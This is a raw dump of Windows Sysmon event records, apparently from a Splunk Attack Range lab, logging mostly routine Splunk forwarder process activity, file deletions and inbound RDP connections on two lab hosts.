11:02:49.410{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218800Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218799Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218798Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218797Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1459-6216-B104-000000003902}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218796Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.410{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1459-6216-B104-000000003902}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218795Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.411{4F8D34B0-1459-6216-B104-000000003902}2772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000218794Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:46.468{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx61759-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218793Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:49.160{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2321FDCF6C24BC7AD6C2923C215BA32,SHA256=5A5DB69D8546F6720455901BA5B3327230F26B9E4EF3504EDB85862B99AAA30A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294540Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:50.892{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2FA158C46CACA7734CC5A6F98CA2920,SHA256=B9B6E8BB3C8E56DC2BFDBED844E8FE8FD37644CDA037B8A1ECBD5F44DC399302,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218824Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:50.191{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90001D6B1B011B02992F92E0403CFC98,SHA256=08F7738DCC89A314660BBF806773CE9FE3A6D560C980F5C6B45FBA6F129EB615,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218823Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:50.161{4F8D34B0-1459-6216-B204-000000003902}38641860C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000294539Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:47.678{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local65533-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294541Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:51.896{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D59276EE1612593958E6E19A5FD91DF0,SHA256=AC293CFB6CAB519C0571C16882F2E8C699642E37433F9B297A34EB6DFB7D319C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218839Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-145B-6216-B304-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218838Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218837Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218836Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218835Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-145B-6216-B304-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218834Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218833Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218832Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218831Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218830Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218829Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218828Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.332{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-145B-6216-B304-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218827Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.333{4F8D34B0-145B-6216-B304-000000003902}1008C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218826Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.176{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02429A04BDC899DE97278F6C40F3419D,SHA256=8CCD8B8DE8FD37AEC2F1A41F93FAF5AACC071E62E9A4E7BB890BE8EB3DE3F1BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218825Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:51.129{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7F0FF8C4E5560B355537D2626D3E0AB3,SHA256=40E6CC273BA26437D42102E587E7A5B3EC3DA8C55CF21E0959603A72F5FC577E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294550Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:52.917{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E6947563AFC9526171347414C4CBCA1,SHA256=7F299CA3930ADAF8DEB6E33F68F43F9A76064BC3745068FA26F4EB78DEAC90AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218842Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:52.333{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=113EE6B84244BF2FFFF6AD1EB63AC68F,SHA256=1F74A789B75E20EDC8170A9A7755E9353A68BC15BDAEF77E3684FEA323636533,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218841Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:50.125{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx61838-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218840Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:02:52.207{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 